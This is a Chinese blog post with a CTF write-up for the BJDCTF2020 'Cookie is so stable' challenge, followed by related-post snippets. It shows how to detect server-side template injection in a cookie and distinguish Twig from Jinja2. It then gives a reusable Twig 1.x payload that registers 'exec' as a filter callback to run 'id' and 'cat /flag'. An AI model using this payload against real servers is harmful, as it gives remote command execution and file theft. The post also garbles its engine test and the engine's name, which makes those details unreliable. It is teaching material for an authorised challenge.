Twing模板注入 [BJDCTF2020]Cookie is so stable1

最新推荐文章于 2024-05-28 17:17:08 发布
最新推荐文章于 2024-05-28 17:17:08 发布
阅读量438 收藏 9
点赞数 6
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_75178803/article/details/136348090
版权

打开题目

 我们先抓包分析一下

可以输入{{7*7}}处发包试一下

可以看到在cookie处存在ssti模板注入

输入{{7*‘7’}},返回49表示是 Twig 模块

输入{{7*‘7’}},返回7777777表示是 Jinja2 模块

在这里可以看出是Twing模块

我们直接用固定payload就可以得到flag

知识点:

1.

输入{{7*‘7’}},返回49表示是 Twig 模块

输入{{7*‘7’}},返回7777777表示是 Jinja2 模块

2.Twing固定的解题payload:

{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}   //查看ID
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}}  //查看flag

//只使用于Twing1.x

参考文章见:Twig 模板注入从零到一 - 先知社区

访白鹿
关注
  • 6
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
第四十七题——[BJDCTF2020]Cookie is so stable
分享简单的安全技术
04-27 181
题目地址:https://buuoj.cn/challenges 解题思路 第一步:进入题目,在导航条看到flag链接,点击后要求提交用户名 第二步:查找漏洞点 输入admin没有反应 输入{{7*'7'}}后出现49,而不是7777777,说明是使用Twig模板而不是Jinja2 第三步:了解Twig漏洞后获取flag Twing漏洞 输入123使用burpsuite抓包,结合题目提示cookie,确定user有问题 修改user值为:{{_self.env.register
[BJDCTF2020]Cookie is so stable
qq_48932191的博客
03-13 571
输入后我们重新进一次flag.php,发现cookie里存储了刚刚登陆时输入的用户名,直接猜是ssti。这里貌似只能显示一行,ls显示不全,所以直接猜flag在根目录下了。flag.php页面我们先随便输入一个名字。尝试后根据ssti特征判断是twig模板。hint提示查看cookies。
第十六章:模板与泛型编程1
zhanghuanzj的博客
03-04 344
1.函数模板1.1 样例template<typename T,class U> //可用typename或class inline T fcn(T v1,U v2){/*...*/} //inline可选1.2 非类型模板参数template <typename T,siez_t N> size_t arr_size(const T(&p)[N]) /
twig模板引擎
hehehhl的博客
10-03 687
Twig是一个灵活、高效并且安全的PHP模板引擎。 如果你使用过Smarty、Django或者Jinja这类基于文本的模板引擎的话,那么你会觉得Twig是很自然而然的事情。Twig严格遵守了PHP的信念,同时增加了在模板环境中很有用的函数,这些做法使得Twig不论是对设计师还是开发人员,都是非常友好的。 Twig的主要特征友: 高效:Twig模板编译成了优化了的PHP文件,与原生的PH
Twing Hot Link For PSP 开发笔记(1)
weixin_34216107的博客
08-16 108
在今年年前的时候,由于想和朋友联机玩PSP游戏(MHP3),但是又不想花钱去买盟卡或者其他的PSPXLink的网卡,所以决定自己研究下开发PSP联机软件的可行性。 下载了目前网络上比较流行的联机软件,MengZone,然后安装并对他进行分析,其中发现最关键的是安装目录下有一个WinPcapDll.dll的库。因为之前对WinPcap有所了解,知道他可以用来捕获网卡的网络数据,然后MengZ...
symfony学习笔记1—简介
weixin_34034261的博客
05-12 518
1.symfony快速入门还是先看代码结构把,这个是拿到代码的第一印象,app/:整个应用的配置,模版,translations,这个可能是多语言文件什么,src/:项目php文件,vendor/:第三方的依赖文件web/:站点的入入口路径,必须在域名后面加上这个目录才能访问整个站点,不存在入口文件这一说法。资源文件如css,javascript等静态文件。还有些前端的控制器什么的。在app/目录...
关于 Twing 联机掉线新的猜想
sweetwxh的专栏
01-05 1827
昨天测试4人联机,4人物里位置分别为:成都,澳门,武汉,郑州。服务器建立在成都,4人网络情况稳定,全程Ping值低于60。然后2个人用无线网卡,2个人用USB,USB线质量也很好,因为我们3人联机,从来就没有掉过。但是,就在这理想的环境下,4人联机,还是掉线。我们之前测试的4人联机,成功过一次,其中3人都是用的USB线。于是我猜想联机掉线的原因有以下几点:1.4人联机,数据量过大,USB传输数据出现问题(但是之前的4人测试,3人USB没有掉线,而且速度很快,无延迟和瞬移,难道是RP好,这个原因暂时忽略)。2
关于 Twing Hot Link 的一些事
weixin_34010949的博客
07-31 57
从THL发布到现在,不断有朋友加群联机。因为上个月服务器到期了,一直没有续费,所以官方网站停止了,不过下载还是可以下载的。 我再把下载地址说一下。THL 1.2.0 .NET 3.5 x64THL 1.2.0 .NET 3.5 x86THL 1.2.0 .NET 4.0 x64THL 1.2.0 .NET 4.0 x86以下为2011-05-05在CSDN发布的Blog。时间过得...
Twing Hot Link常见问题以及掉线问题的解决办法
sweetwxh的专栏
01-01 5470
1.安装问题:首先,请确保已经按照安装说明正常进行了安装。再此说明一下必装软件:.NET Framework  4.0,Visual C++ 2010 Redistrubute,WinPcap 4.12,如果使用USB联机,则还需要安装PSP Type B的驱动(PSP要安装AdHocToUSB插件),在压缩包内都有安装说明。XP的用户如果安装了.NET 3.5还是无法启动3.5版本,请安装.NET 4.0。公测版本无需安装MS Loopback Adapter,很多朋友还在问如何安装此网络适配器。没有安装
gulp-twing:使用Gulp编译Twig模板。 建立在牵引
02-03
用编译模板。 建立在。 需要 ≥6.0.0 安装 npm install twing gulp-twing --save 用法 var twing = require('gulp-twing'); twing(env,data = {},options = {}) 返回一个需要输入文件名的对象转换流。 环保...
ROM文件查看和修改工具
11-22
最后根据自已的机型保存就可以了,(我们是Herald机型:HTC P4350、国行C858、C800、TWING) 定制的成品ROM,发现小问题,我都会用这软件时行修改; 像加个软件,换个拨号面板,改注册表等等都能通过这软件轻易实现,...
简单3步,ERP、OA、CRM等客户端,安全远程访问服务端
oray2013的专栏
05-22 262
然而,如何确保在不同地点的员工都能安全、便捷地访问公司内网的C/S(Client/Server)架构办公系统,是一个亟待解决的问题。采用贝锐花生壳内网穿透服务,可以简化这些步骤,使得远程访问变得异常简单。无需公网IP,无需繁琐的路由和网关配置,简单三步,即可实现远程访问。目前,除了上述举例的ERP系统,市面上主流C/S(Client/Server)架构办公系统均可搭配贝锐花生壳实现远程访问。传统的远程访问解决方案往往需要复杂的网络配置,包括公网IP的申请、路由和网关的设置等。
【Linux安全】iptables防火墙(二)
F12138X的博客
05-22 830
驽马十驾,功在不舍
nginx 安全配置
最新发布
fangxiang2008的博客
05-28 597
nginx 安全配置
汽车制造业安全有效的设计图纸文件外发系统是什么样的?
镭速的博客
05-28 391
在汽车制造的设计图发送过程中,安全和效率是公司最关心的两个点。镭速凭借它的高效稳定的传送性能、强大的安全特性、灵活的权限控制和全方位的服务,给企业提供了一个既安全又可靠、既高效又高效的设计图发送解决方案。随着公司对数据安全和工作效率的要求越来越高,镭速肯定会成为汽车制造公司设计图发送的首选。
电脑记事软件哪款安全?好用且安全的桌面记事工具
2401_83063993的博客
05-28 184
它采用了HTTPS、SASL、Secret Key等多重安全认证,确保我的数据在传输和存储过程中都得到了严格的保护。它允许我将重要的内容独立显示在软件之外,这样我就不用再软件中翻找,从而快速查看关键信息。然而,在享受电脑记事便捷性的同时,我也曾担忧过数据的安全性。毕竟,这些记录中包含了大量的工作信息和私人想法,一旦泄露,后果不堪设想。更重要的是,敬业签支持记录多种类型的内容,包括文字、图片、视频和文件,这极大地丰富了我的记事方式。总之,敬业签不仅提供了便捷、多样的记事功能,还在数据安全方面做得非常出色。
记一次重定向问题(浏览器安全)解决
zhangximing的博客
05-21 382
重定向地址被浏览器自动嵌套https
推荐一套长续航fpv组装参数
06-09
如果你想要组装一套长续航的FPV(First Person View)无人机,可以考虑以下参数: 1. 机架:选择轻量化但是结实的机架,例如iFlight TITAN XL5 HD。 2. 电池:选择高容量的电池,例如TATTU R-Line 6S 14000mAh电池。 3. 电机:选择低KV值的电机,例如T-MOTOR F60 Pro IV 1950KV电机。 4. ESC:选择高效率的ESC,例如T-MOTOR F55A Pro II。 5. 相机:选择低功耗但是画质好的相机,例如Caddx Tarsier 4K 30fps HD双镜头相机。 6. 飞控:选择轻量化但是稳定性好的飞控,例如iFlight SucceX F7 TwinG。 7. 螺旋桨:选择低功耗的螺旋桨,例如iFlight Nazgul T3061三叶螺旋桨。 以上是一套长续航FPV无人机的基本参数,当然还有很多其他的参数需要根据个人需求和预算来选择和搭配。在组装过程中,需要注意飞行控制器和电机的预设参数,以确保飞行稳定且能够充分发挥电池的电量。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值